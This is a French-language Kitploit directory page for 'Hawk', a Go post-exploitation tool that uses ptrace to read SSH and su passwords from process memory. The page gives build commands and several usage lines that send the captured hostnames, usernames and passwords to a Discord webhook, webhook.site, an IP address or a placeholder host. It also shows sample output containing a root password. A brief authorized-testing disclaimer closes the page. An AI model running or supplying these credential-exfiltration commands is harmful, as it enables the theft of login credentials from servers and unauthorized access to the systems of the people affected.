Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Hawk — Outil Golang conçu pour exfiltrer les mots de passe trouvés via les services sshd et su | Kitploit
Outils/GitHubGitHub/prodefense/hawk
Attaques de Mots de PasseExfiltration de DonnéesCollecte d'InformationsPost-ExploitationTests d'IntrusionRed Teaming
GitHubprodefense/hawk

Hawk

Outil Golang conçu pour exfiltrer les mots de passe trouvés via les services sshd et su

Voir le dépôt
386il y a 8 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager



Hawk

Intercepter silencieusement les identifiants SSH et SU en temps réel

Hawk surveille les processus sshd et su, extrayant les mots de passe de la mémoire via ptrace sans modifier les processus cibles. Zéro écriture. Collecte d'identifiants en lecture seule pure.

Démo

Exemple

Comment ça marche

Hawk exploite le système de fichiers /proc de Linux pour découvrir les processus SSH et SU, puis utilise ptrace pour s'y attacher et intercepter les appels système. Lorsqu'une authentification par mot de passe se produit, il lit le mot de passe directement depuis la mémoire du processus pendant l'appel système write()—de manière totalement transparente pour le processus cible. Les identifiants sont exfiltrés via un webhook ou affichés sur stdout.

Pour aller plus loin : Article de blog

Compilation

root@kitploit:~
GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -o hawk

Utilisation

Webhook Discord

Hawk détecte automatiquement les webhooks Discord et envoie des messages formatés :

root@kitploit:~
./hawk https://discord.com/api/webhooks/YOUR_WEBHOOK_ID/YOUR_WEBHOOK_TOKEN

Configuration : Créez un webhook dans votre serveur Discord en suivant le guide des webhooks Discord. Les identifiants apparaîtront dans votre canal formatés avec le nom d'hôte, le nom d'utilisateur et le mot de passe.

Webhooks génériques

Pour les autres services de webhook (webhook.site, serveurs personnalisés, etc.) :

root@kitploit:~
# HTTPS (auto-detected)
./hawk https://webhook.site/your-unique-id

# HTTP
./hawk http://192.168.1.100:6969/webhook

# Auto HTTPS if no protocol specified
./hawk webhook.example.com/path

Mode stdout

Pas de webhook ? Les identifiants sont affichés sur stdout :

root@kitploit:~
./hawk

Sortie :

root@kitploit:~
hostname=server01 username=root password=SuperSecret123

Prérequis

  • Système Linux avec ptrace activé
  • Système de fichiers /proc monté
  • Privilèges root (requis pour ptrace)

Avertissement

Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives. L'accès non autorisé à des systèmes informatiques est illégal. Utilisez-le de manière responsable et uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de tester.

Crédits

Inspiré par les travaux de blendin sur 3snake.

Télécharger l’outil